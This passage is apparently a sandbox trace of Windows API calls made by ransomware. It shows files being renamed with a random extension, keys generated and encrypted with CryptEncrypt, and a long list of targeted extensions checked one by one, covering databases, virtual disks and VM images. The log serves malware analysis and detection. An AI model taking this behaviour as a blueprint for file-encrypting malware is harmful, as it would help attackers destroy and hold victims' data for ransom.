lpNewFileName="C:\\ProgramData\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn.UAKXC" (normalized: "c:\\programdata\\microsoft help\\ms.infopatheditor.14.1033.hxn.uakxc")) returned 1 [0140.836] GetProcessHeap () returned 0xea0000 [0140.836] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef34d0 | out: hHeap=0xea0000) returned 1 [0140.836] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd7f0 | out: hHeap=0xea0000) returned 1 [0140.836] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6c90 | out: hHeap=0xea0000) returned 1 [0140.836] CryptGenRandom (in: hProv=0xecf568, dwLen=0x20, pbBuffer=0x397fd50 | out: pbBuffer=0x397fd50) returned 1 [0140.836] CryptGenRandom (in: hProv=0xecf568, dwLen=0x8, pbBuffer=0x397fd48 | out: pbBuffer=0x397fd48) returned 1 [0140.836] CryptEncrypt (in: hKey=0xecf820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x397fd70*, pdwDataLen=0x397fc8c*=0x200) returned 1 [0140.837] GetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.14.1033.hxn")) returned 0x2022 [0140.847] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6c8 [0140.848] GetLastError () returned 0x0 [0140.848] GetFileSizeEx (in: hFile=0x6c8, lpFileSize=0x397fc88 | out: lpFileSize=0x397fc88*=344) returned 1 [0140.848] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".4dd") returned 0x0 [0140.848] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".4dl") returned 0x0 [0140.848] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".accdb") returned 0x0 [0140.848] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".accdc") returned 0x0 [0140.848] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".accde") returned 0x0 [0140.848] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".accdr") returned 0x0 [0140.848] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".accdt") returned 0x0 [0140.848] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".accft") returned 0x0 [0140.848] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".adb") returned 0x0 [0140.848] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".ade") returned 0x0 [0140.848] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".adf") returned 0x0 [0140.848] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".adp") returned 0x0 [0140.848] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".arc") returned 0x0 [0140.848] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".ora") returned 0x0 [0140.848] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".alf") returned 0x0 [0140.849] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".ask") returned 0x0 [0140.849] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".btr") returned 0x0 [0140.849] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".bdf") returned 0x0 [0140.849] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".cat") returned 0x0 [0140.849] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".cdb") returned 0x0 [0140.849] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".ckp") returned 0x0 [0140.849] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".cma") returned 0x0 [0140.849] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".cpd") returned 0x0 [0140.849] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".dacpac") returned 0x0 [0140.849] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".dad") returned 0x0 [0140.849] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".dadiagrams") returned 0x0 [0140.849] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".daschema") returned 0x0 [0140.849] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".db") returned 0x0 [0140.849] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".db-shm") returned 0x0 [0140.849] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".db-wal") returned 0x0 [0140.849] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".db3") returned 0x0 [0140.849] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".dbc") returned 0x0 [0140.849] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".dbf") returned 0x0 [0140.849] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".dbs") returned 0x0 [0140.849] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".dbt") returned 0x0 [0140.849] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".dbv") returned 0x0 [0140.849] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".dbx") returned 0x0 [0140.849] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".dcb") returned 0x0 [0140.849] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".dct") returned 0x0 [0140.849] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".dcx") returned 0x0 [0140.849] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".ddl") returned 0x0 [0140.849] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".dlis") returned 0x0 [0140.850] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".dp1") returned 0x0 [0140.850] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".dqy") returned 0x0 [0140.850] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".dsk") returned 0x0 [0140.850] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".dsn") returned 0x0 [0140.850] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".dtsx") returned 0x0 [0140.850] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".dxl") returned 0x0 [0140.850] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".eco") returned 0x0 [0140.850] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".ecx") returned 0x0 [0140.850] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".edb") returned 0x0 [0140.850] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".epim") returned 0x0 [0140.850] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".exb") returned 0x0 [0140.850] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".fcd") returned 0x0 [0140.850] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".fdb") returned 0x0 [0140.850] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".fic") returned 0x0 [0140.850] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".fmp") returned 0x0 [0140.850] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".fmp12") returned 0x0 [0140.850] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".fmpsl") returned 0x0 [0140.850] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".fol") returned 0x0 [0140.850] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".fp3") returned 0x0 [0140.850] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".fp4") returned 0x0 [0140.850] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".fp5") returned 0x0 [0140.850] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".fp7") returned 0x0 [0140.850] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".fpt") returned 0x0 [0140.850] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".frm") returned 0x0 [0140.850] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".gdb") returned 0x0 [0140.850] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".grdb") returned 0x0 [0140.850] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".gwi") returned 0x0 [0140.851] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".hdb") returned 0x0 [0140.851] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".his") returned 0x0 [0140.851] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".ib") returned 0x0 [0140.851] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".idb") returned 0x0 [0140.851] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".ihx") returned 0x0 [0140.851] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".itdb") returned 0x0 [0140.851] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".itw") returned 0x0 [0140.851] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".jet") returned 0x0 [0140.851] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".jtx") returned 0x0 [0140.851] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0140.851] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".kexi") returned 0x0 [0140.851] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".kexic") returned 0x0 [0140.851] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".kexis") returned 0x0 [0140.851] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".lgc") returned 0x0 [0140.851] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".lwx") returned 0x0 [0140.851] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".maf") returned 0x0 [0140.851] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".maq") returned 0x0 [0140.851] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".mar") returned 0x0 [0140.851] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".mas") returned 0x0 [0140.851] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".mav") returned 0x0 [0140.851] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".mdb") returned 0x0 [0140.851] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".mdf") returned 0x0 [0140.851] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".mpd") returned 0x0 [0140.851] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".mrg") returned 0x0 [0140.851] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".mud") returned 0x0 [0140.851] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".mwb") returned 0x0 [0140.852] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".myd") returned 0x0 [0140.852] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".ndf") returned 0x0 [0140.852] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".nnt") returned 0x0 [0140.852] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".nrmlib") returned 0x0 [0140.852] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".ns2") returned 0x0 [0140.852] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".ns3") returned 0x0 [0140.852] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".ns4") returned 0x0 [0140.852] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".nsf") returned 0x0 [0140.852] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".nv") returned 0x0 [0140.852] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".nv2") returned 0x0 [0140.852] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".nwdb") returned 0x0 [0140.852] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".nyf") returned 0x0 [0140.852] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".odb") returned 0x0 [0140.852] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".oqy") returned 0x0 [0140.852] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".orx") returned 0x0 [0140.852] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".owc") returned 0x0 [0140.852] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".p96") returned 0x0 [0140.852] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".p97") returned 0x0 [0140.852] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".pan") returned 0x0 [0140.852] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".pdb") returned 0x0 [0140.852] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".pdm") returned 0x0 [0140.852] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".pnz") returned 0x0 [0140.852] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".qry") returned 0x0 [0140.852] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".qvd") returned 0x0 [0140.853] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".rbf") returned 0x0 [0140.853] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".rctd") returned 0x0 [0140.853] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".rod") returned 0x0 [0140.853] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".rodx") returned 0x0 [0140.853] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".rpd") returned 0x0 [0140.853] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".rsd") returned 0x0 [0140.853] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".sas7bdat") returned 0x0 [0140.853] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".sbf") returned 0x0 [0140.853] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".scx") returned 0x0 [0140.853] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".sdb") returned 0x0 [0140.853] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".sdc") returned 0x0 [0140.853] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".sdf") returned 0x0 [0140.853] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".sis") returned 0x0 [0140.853] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".spq") returned 0x0 [0140.853] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".sql") returned 0x0 [0140.853] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".sqlite") returned 0x0 [0140.853] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".sqlite3") returned 0x0 [0140.853] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".sqlitedb") returned 0x0 [0140.853] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".te") returned 0x0 [0140.853] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".temx") returned 0x0 [0140.853] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".tmd") returned 0x0 [0140.853] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".tps") returned 0x0 [0140.853] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".trc") returned 0x0 [0140.853] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".trm") returned 0x0 [0140.853] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".udb") returned 0x0 [0140.853] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".udl") returned 0x0 [0140.854] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".usr") returned 0x0 [0140.854] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".v12") returned 0x0 [0140.854] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".vis") returned 0x0 [0140.854] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".vpd") returned 0x0 [0140.854] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".vvv") returned 0x0 [0140.854] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".wdb") returned 0x0 [0140.854] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".wmdb") returned 0x0 [0140.854] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".wrk") returned 0x0 [0140.854] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".xdb") returned 0x0 [0140.854] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".xld") returned 0x0 [0140.854] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".xmlff") returned 0x0 [0140.854] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".abcddb") returned 0x0 [0140.854] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".abs") returned 0x0 [0140.854] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".abx") returned 0x0 [0140.854] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".accdw") returned 0x0 [0140.854] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".adn") returned 0x0 [0140.854] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".db2") returned 0x0 [0140.854] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".fm5") returned 0x0 [0140.854] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".hjt") returned 0x0 [0140.854] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".icg") returned 0x0 [0140.854] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".icr") returned 0x0 [0140.854] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".kdb") returned 0x0 [0140.854] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".lut") returned 0x0 [0140.854] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".maw") returned 0x0 [0140.854] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".mdn") returned 0x0 [0140.855] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".mdt") returned 0x0 [0140.855] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".vdi") returned 0x0 [0140.855] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".vhd") returned 0x0 [0140.855] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".vmdk") returned 0x0 [0140.855] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".pvm") returned 0x0 [0140.855] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".vmem") returned 0x0 [0140.855] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".vmsn") returned 0x0 [0140.855] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".vmsd") returned 0x0 [0140.855] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".nvram") returned 0x0 [0140.855] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".vmx") returned 0x0 [0140.855] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".raw") returned 0x0 [0140.855] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".qcow2") returned 0x0 [0140.855] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".subvol") returned 0x0 [0140.855] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", lpSrch=".bin") returned 0x0 [0140.855] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn", 